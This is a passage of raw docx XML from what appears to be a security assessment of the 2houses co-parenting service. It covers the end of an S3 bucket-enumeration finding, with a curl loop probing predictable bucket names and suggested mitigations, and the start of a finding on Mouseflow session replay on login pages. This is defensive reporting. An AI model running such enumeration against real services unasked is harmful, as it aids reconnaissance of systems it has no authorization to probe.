          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> bucket </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>does NOT permit public listing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  GET https://accounts-production.s3.amazonaws.com/?list-type=2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  → 403 AccessDenied</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Good — bucket is properly configured.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Assets served from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>accounts-production.s3.amazonaws.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are individually readable (they are referenced in login HTML) but the bucket doesn't expose its object list.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Takeaways</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Bucket naming is predictable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>accounts-*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>2houses-*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. An attacker can enumerate them in seconds.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>All known buckets are properly set to private with listing disabled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — that's the correct configuration. No immediate exposure here.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>`2houses-backup` exists</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — worth confirming that individual backup keys are not reachable without authentication (would need per-object probing to verify, not done).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>`accounts-development` exists</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — a dev-tier bucket on the internet. Worth verifying it doesn't contain real user data snapshots.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Recommended mitigations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Keep `BlockPublicAccess` enabled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> at the account level (AWS S3 Account setting → Block all public access).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Add explicit bucket policies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that deny </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>s3:GetObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to Principal </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>accounts-development</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>2houses-backup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> specifically. Currently those buckets might have default-private but no explicit deny.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Rotate to non-guessable bucket names</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> during the next infra rebuild (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>&lt;account&gt;-&lt;short-random&gt;-&lt;env&gt;-&lt;purpose&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>). Not urgent but hardens.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Review what is in `accounts-development`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. If it's a copy of prod, that's a separate finding worth High.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Treat 403 vs 404 as information</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — this is the standard way to enumerate AWS. Not a bug in 2houses; it's how S3 works.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="170"/>
        <w:shd w:val="clear" w:fill="F5F5F5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>$ for bkt in accounts-production accounts-staging accounts-development \</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">             2houses-production 2houses-backup; do</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    curl -sI -o /dev/null -w "%{http_code}  $bkt\n" "https://$bkt.s3.amazonaws.com/"</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  done</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(single HEAD request per bucket, no body fetched)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="480"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>FINDING-005 — Mouseflow session replay is active on the login and password-reset pages</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Medium (privacy / GDPR, not classical security)  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Category:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Third-party session replay exposure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accounts.2houses.com/en/users/sign_in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>accounts.2houses.com/en/users/password/new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (and likely more)  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Status:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Confirmed from HAR + bundle analysis (Mouseflow project </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>17d3041b-cc09-4b3e-b4e6-21ff1fa7b1a1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Observation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The Mouseflow session-replay SDK is loaded on the login and password-reset pages. Mouseflow records every keystroke, mouse movement, scroll, and form interaction in the browser and ships it to Mouseflow's servers for playback by customer-success / product teams.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Even with Mouseflow's built-in "password field masking", the following leak in practice:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Email addresses typed into the login form.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Plain text, on every page view.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Timing information</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — keystroke intervals reveal typing patterns (a side-channel for password length / structure).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Any clipboard paste event</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — if the user pastes a password from a manager, the paste event fires events even if the value is masked.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Autofill interactions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Failed login attempts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the resulting error flash messages — correlates emails to "account exists" oracles.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Password reset flow.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> If a user types the reset token into a form, that token travels to Mouseflow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1F3A5F"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Why this matters for 2houses specifically</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Co-parenting app with minors' data.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> The legal bar for third-party data processors is higher than for a generic SaaS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Sub-processor disclosure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:fill="F3F3F3"/>
        </w:rPr>
        <w:t>/en/about_privacy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) lists Stripe, OVH, Google, AWS, Mandrill, Intercom — I did not see </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Mouseflow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in that list.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="0"/>
